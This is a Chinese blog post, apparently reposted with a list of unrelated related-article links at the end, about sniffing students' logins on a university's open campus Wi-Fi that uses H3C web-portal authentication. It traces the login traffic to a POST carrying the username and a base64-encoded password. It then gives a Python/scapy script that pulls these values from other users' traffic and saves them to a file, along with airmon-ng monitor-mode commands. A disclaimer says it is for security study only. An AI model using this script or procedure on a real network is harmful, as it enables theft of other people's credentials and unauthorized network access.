***********************本文提及的方法仅供安全学习用途,禁止非法利用**************************

0x00 写在前面

某高校校区的校园网WIFI的采用H3C的Web认证,在网页里输入学号和密码,post出去,你的这个mac地址就可以上网了。此方式不是wpa/wpa2,也不是802.1x,而只是单纯的web认证,是大有文章可做的。因此我想是否能在开放无线网环境中抓取到登陆时认证发送的数据包,从中取出用户名和密码。

参考Freebuf的如何在开放无线网络中嗅探校园网密码这篇文章提供的python脚本,针对该校的网络进行了一些修改,使用该脚本嗅探校园网WIFI账号密码。

0x01 初步分析认证交互

查看DOM

发现了几个重要的函数。base64()、checkUserName()、encrypt()

base64是将输入的文本进行一次base64编码,checkUerName就是检查用户名,encrypt是将密码再进行一次加密。

分析网络流

首先使用火狐的firebug+检查元素来分析网络流。

当我们访问登陆页面时,发送GET请求并带一个i_p_pl的cookie

尝试登陆,登陆成功跳转到http://192.168.xxx.x:xxxx/portal/page/loginSucc.jsp,发送了*个GET请求,除去图片和脚本,此次登陆只向/portal/loginSucc.jsp发送了GET包,除了i_p_pl,还带有hello1、hello2两个个cookie,其中hello1为登陆发送的username,hello2暂不明其含义。

在后来的测试中,发现hello2是【记住登陆】功能的参数,当hello2=false时不记住,hello2=true时记住并附带hello3、hello4、hello5参数,本来应当是可以利用这些cookie来绕过登陆直接请求认证的,不过考虑到其又要增加工作量,因此先放一边。

这就很奇怪了,在整个登陆过程全部都是GET请求而没有POST请求,没有POST请求是怎么把用户名密码传输上去认证的呢?况且之前已经在DOM中发现了base64encode()和query()函数。难道用户名和密码是在GET时Cookie中传上去的?。虽然不用想就知道GET发送cookie来登陆很扯,但还是要研究一下cookie的含义。

探究cookie含义

登陆时发送的i_p_pl

i_p_pl=JTdCJTIyZXJyb3JOdW1iZXIlMjIlM0ElMjIxJTIyJTJDJTIybmV4dFVybCUyMiUzQSUyMmh0dHAlM0ElMkYlMkYxOTIuMTY4LjE1MC4yJTNBODA4MCUyRnBvcnRhbCUyRmluZGV4X2RlZmF1bHQuanNwJTIyJTJDJTIycXVpY2tBdXRoJTIyJTNBZmFsc2UlMkMlMjJjbGllbnRMYW5ndWFnZSUyMiUzQSUyMkNoaW5lc2UlMjIlMkMlMjJhc3NpZ25JcFR5cGUlMjIlM0EwJTJDJTIyaU5vZGVQd2ROZWVkRW5jcnlwdCUyMiUzQTElMkMlMjJ3bGFubmFzaWQlMjIlM0ElMjIlMjIlMkMlMjJ3bGFuc3NpZCUyMiUzQSUyMiUyMiUyQyUyMm5hc0lwJTIyJTNBJTIyJTIyJTJDJTIyYnlvZFNlcnZlcklwJTIyJTNBJTIyMC4wLjAuMCUyMiUyQyUyMmJ5b2RTZXJ2ZXJJcHY2JTIyJTNBJTIyMDAwMCUzQTAwMDAlM0EwMDAwJTNBMDAwMCUzQTAwMDAlM0EwMDAwJTNBMDAwMCUzQTAwMDAlMjIlMkMlMjJieW9kU2VydmVySHR0cFBvcnQlMjIlM0ElMjI4MDgwJTIyJTJDJTIyaWZUcnlVc2VQb3B1cFdpbmRvdyUyMiUzQWZhbHNlJTJDJTIydWFtSW5pdEN1c3RvbSUyMiUzQSUyMjElMjIlMkMlMjJjdXN0b21DZmclMjIlM0ElMjJNUSUyMiUyQyUyMnJlZ0NvZGVUeXBlJTIyJTNBJTIyTUElMjIlN0Q

很明显这是一个base64编码过的字符串,把这个base64解码再url解码,就得到了

{"errorNumber":"1","nextUrl":"http://192.168.xxx.x:xxxx/portal/index_default.jsp","quickAuth":false,"clientLanguage":"Chinese","assignIpType":0,"iNodePwdNeedEncrypt":1,"wlannasid":"","wlanssid":"","nasIp":"","byodServerIp":"0.0.0.0","byodServerIpv6":"0000:0000:0000:0000:0000:0000:0000:0000","byodServerHttpPort":"8080","ifTryUsePopupWindow":false,"uamInitCustom":"1","customCfg":"MQ","regCodeType":"MA"}

这只是向无线路由器发送的表明自己身份的未完成的表单,没有我们要的用户名和密码。

0x02 Wireshark抓取完整认证过程

只有GET请求果然很扯,这很有可能是我们的浏览器网络流分析工具有些问题,或者该Web认证的安全性足够好,导致我们无法截取完整的请求流。

这样就只有用Wireshark来对网卡进行完全的监听,以抓取全部流量包。

设置Capture interface为 WLAN 无线网卡,开启抓取后重现登陆过程。

抓到的流量包除了访问该认证网站的http流,还包括了所有经过该无线网卡的所有协议的网络流。

设置过滤规则为http协议并且只有该认证网址ip。

发现登录一次h3c系统,要先后传参给3个页面,一个/pws?t=li,一个/afterlogin.jsp,一个/loginSucc.jsp,所以就分别看这几个网页的抓包数据。

发现其cookie都是一样的,但是只有pws这个页面是POST请求。

查看pws应用层传输的数据,发现上传了【userName】和【userPwd】参数,也就是说,只有这个页面是验证密码的。

【userName】就是登陆的用户名,【userPwd】是经过base64编码后的密码。

0x03 总结思路

我们可以抓取用户登陆时的POST请求来获取用户名和密码,也可以在用户勾选【记住密码】时获取带有用户名密码信息的cookie。当抓到client ==> server的数据包时如果是GET请求,检查有没有Cookie存在。

如果是POST请求,把用户名和密码拿出来。2. 当抓到的是server ==> client的数据包时检查是否有set-cookie头部,有的话取出来。

最后如果有cookie被嗅探到,就带着cookie把向server索要一下密码。

但是为了偷懒,这里就不嗅探cookie了,直接嗅探POST的用户名和密码就行了。最终思路如下:

当抓到client ==> server的数据包时,如果是POST请求,直接把用户名和密码拿出来。

0x04 嗅探

实验环境Ubuntu虚拟机

大功率USB无线网卡(8187等)

python2.7

python扩展库需要requests

scapy

scapy_http

lxml

代码

import requests

import scapy_http.http as http

from scapy.all import *

from lxml import etree

iface = 'wlan0'

url = "http://192.168.xxx.x:xxxx/portal/pws?t=li"

path = "/root"

def prn(pkt):

data = None

#std ==> ap

if pkt.haslayer(http.HTTPRequest):

#if post the username and password

if pkt.Method == 'POST' and 'userName' in pkt.load:

dt = {i.split("=")[0]:i.split("=")[1] for i in pkt.load.split("&")}

data = ":::".join((dt["userName"],dt["userPwd"][3:].decode("base64"))) + '\n'

print '[+]Get! Post data:%s%s%s%s'%(dt['userName'],dt['userPwd'])

if data != None:

with open(path + "schoolUserPwd.txt", "a") as txt:

txt.write(data)

def main():

try:

sniff(iface=iface, prn=prn, filter="ip host 192.168.xxx.x", store=0)

#sniff(offline=path + "school.pcap", prn=prn, filter="ip host 192.168.xxx.x")

except KeyboardInterrupt, e:

print "quitting..."

if __name__ == '__main__':

main()

说明requests用来向服务器请求

scapy用来在无线网络中嗅探

scapy_http用来对http协议更方便的解析

lxml用来从服务器返回的html文件中,解析出来用户名和密码

prn是sniff函数每过滤到一个符合条件的数据包时回调的函数,并将数据包本身作为参数传入

之所以选择Ubuntu而不是Windows是因为scapy_http在win下运行有些问题

注意

由于我们既要嗅探,同时又要向服务器请求,所以airmon-ng check kill后,无线网卡开启monitor模式,再将网卡调到信号最强的ap的信道上。之前经过kismet抓取无线网包发现该校园网WIFI是在channel 1/6/11信道上工作的。

最后再打开网络管理的服务。

执行以下命令

$sudo airmon-ng check kill

$sudo ifconfig wlan0 down

$sudo iwconfig wlan0 mode monitor

$sudo ifconfig wlan0 up

$sudo iwconfig mon0 channel 1/6/11

$sudo service network-manager start

结果

由于之前买的无线网卡是劣质品无法识别,因此暂无结果。

理论上是可以嗅探到的,等成功嗅探后再补发。

就算没有嗅探到,这个思路也是可以学习一下的。。。

******************再次强调,本文提及的方法仅供安全学习用途,禁止非法利用******************

参考:

python 抓网卡数据包 解析wifi_某高校校园网WIFI嗅探用户名密码实践相关推荐

  1. python 抓网卡数据包_Python选择网卡发包及接收数据包

    当一台计算机上有多个网卡时,需要选择对应IP地址的网卡进行发送数据包或者接受数据包. 1.选择网卡发包(应用scapy):plface=conf.route.route("××.××.××. ...

  2. python抓取数据包_python抓数据包

    广告关闭 腾讯云11.11云上盛惠 ,精选热门产品助力上云,云服务器首年88元起,买的越多返的越多,最高返5000元! 前言:数据科学越来越火了,网页是数据很大的一个来源. 最近很多人问怎么抓网页数据 ...

  3. linux抓网卡数据包命令,Linux抓包命令tcpdump命令图解

    原标题:Linux抓包命令tcpdump命令图解 tcpdump命令-->用来将网络中传送的数据包的"头"完全截获下来提供分析,常见的有Wireshark.在Linux中输入 ...

  4. python抓取数据包_利用python-pypcap抓取带VLAN标签的数据包方法

    1.背景介绍 在采用通常的socket抓包方式下,操作系统会自动将收到包的VLAN信息剥离,导致上层应用收到的包不会含有VLAN标签信息.而libpcap虽然是基于socket实现抓包,但在收到数据包 ...

  5. python UDP通信数据包解析将结果写入Excel中

    部分通信协议: 建立UDP连接: server_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) address = ('10.0.17 ...

  6. python获取路由器数据包pppoe_利用PPPOE获取路由器中宽带账号密码

    pppoe工作原理 PPPoE协议的工作流程包含发现和会话两个阶段,发现阶段是无状态的,目的是获得PPPoE终结端(在局端的ADSL设备上)的以太网MAC地址,并建立一个唯一的PPPoE SESSIO ...

  7. python怎么编写wireshark抓的包_使用Wireshark 抓取数据包

    Wireshark 是一个网络封包分析软件.网络封包分析软件的功能是获取网络封包,并尽可能显示出最为详细的网络封包资料.Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换. 一  ...

  8. jpcap抓包,TCP数据包逻辑分析,TCP数据包解析

    1.jpcap抓包 https://github.com/kumqu/java-jpcap 2.TCP逻辑分析 3.TCP数据包解析 3.1 数据包解析源码 import com.alibaba.fa ...

  9. python网络数据包分析_Pyshark:使用了WirdShark的Python数据包解析工具(Tshark)

    Pyshark Pyshark是一款针对tshark的Python封装器,在Pyshark的帮助下,广大研究人员可以使用wireshark的解析器来进行Python数据包解析.扩展文档:[Pyshar ...

最新文章

  1. 硬盘无法访问文件系统损坏,里面的资料怎样恢复
  2. Amqp整合com.rabbitmq.client.ShutdownSignalException: channel error; protocol method异常处理
  3. 推荐一些冷门但是超级实用的工具
  4. Git管理工具对比(GitBash、EGit、SourceTree)(转载)
  5. 回顾 | 在 GitHub 上贡献到开源项目
  6. 前端学习(1610):hook使用
  7. 高级程序员如何面对职场压力?(2)--受伤的总是我
  8. java 使用fusioncharts_fusioncharts同一页面显示2个仪表盘,且以java字符串作为xml数据...
  9. springMVC视频教程
  10. 开源流媒体服务器:为何一定得再撸个新的 | 凌云时刻
  11. JAVA-SE基础篇-位运算
  12. 《我的成功可以复制》读后感
  13. 滤波器设计常用术语(1)
  14. 木讷的程序员需要知道的事情 (二)
  15. 微信公众号自动回复机器人
  16. 程伟健:新城易居携手中旅联盟深度发力打造城市中心文旅目的地
  17. 5G NR协议学习--TS38.211主要参数解读
  18. k3显示远程服务器未打开,k3客户端远程服务器链接
  19. ::细细品味ASP.NET (二)::
  20. Java毕设项目汽车4S服务管理系统(java+VUE+Mybatis+Maven+Mysql)

热门文章

  1. 邮箱中已发出的电子邮件发错了怎么撤回?
  2. 包无法更新、相关性或冲突验证解决方案
  3. Android 使用Notification进行消息提示
  4. 单视图几何Vanish Point(消失点/灭点)计算方法——Robert_T_Collins(罗伯特·柯林斯)算法
  5. 基于非洲秃鹫优化算法的函数寻优算法
  6. SyncToy多电脑工作离线同步/备份方案
  7. Lightgbm模型两种保存方式
  8. 黑暗星空中的秘密——《黑暗森林》简评
  9. 构建自己的GAFATA
  10. 应用宝上架审核要求_腾讯应用宝开发者福利!2小时内审核